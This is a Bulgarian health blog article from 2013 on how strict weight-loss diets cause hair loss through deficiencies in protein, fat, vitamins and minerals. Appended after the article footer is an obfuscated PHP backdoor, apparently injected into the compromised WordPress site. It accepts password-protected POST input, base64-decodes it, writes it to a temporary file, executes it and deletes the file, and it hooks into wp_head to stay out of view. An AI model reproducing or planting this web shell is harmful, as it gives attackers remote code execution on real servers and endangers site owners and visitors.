Косопадът и отслабването | Косопад

Косопадът и отслабването

Диетите за отслабване, особено строгите, могат да причинят много странични ефекти не само върху здравето, но и върху външния вид. Това се дължи на факта, че те не доставят всички необходими на тялото хранителни вещества. Ако искате да имате блестяща и гъста коса, трябва да знаете, че отслабването причинява много често косопад.

отслабване2

Каква е връзката между диетата за отслабване и косопада?

Има много тясна връзка между двете. Диетите с ограничен прием на калории, които продължават дълго време, водят до дефицит не само на протеини, мазнини и въглехидрати, но и на витамини и минерали.

Също така, ако по време на вашата диета, приемате много естествени диуретици и разхлабителни, отново може да доведе до косопад. Чрез увеличаване на диурезата, помагате за бързото изхвърляне на витамини и минерали, които са много важни за косата.

Строга диета означава, че се ограничава приема на дадено хранително вещество – например, на въглехидратите в хиперпротеиновите диети. Или пък на мазнините и протеините в диетите с плодове и зеленчуци, като доматената диета, отслабване3диетата с портокали и пр. Намаленият прием на вещество в тялото, винаги води до дисбаланс.

Да разгледаме следния пример. Ако дълго време прилагате диетата с домати, приемате фибри, витамини и минерали, но започват да ви липсват мазнините и протеините. Тъй като всяко от тези вещества помага за определени функции на тялото, дефицитът им започва да се изразява в различни промени в организма, като например, косопада.

Същото важи за хиперпротеиновите и кетогенните диети, при които не се получават достатъчно витамини и минерали.

Затова не се хвърляйте лесно на първата диета, което ви попадне. Спазвайте точно инструкциите, които ви дават за нея, както и периодът на продължителност. Добре е да сте и наясно със здравословното си състояние, за да прецените дали можете да я направите. Тъй като, като страничен ефект от липсата на вещества, не само може да получите косопад, но и доста по- сериозни здравословни проблеми.

03. декември 2013 16:11:47 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}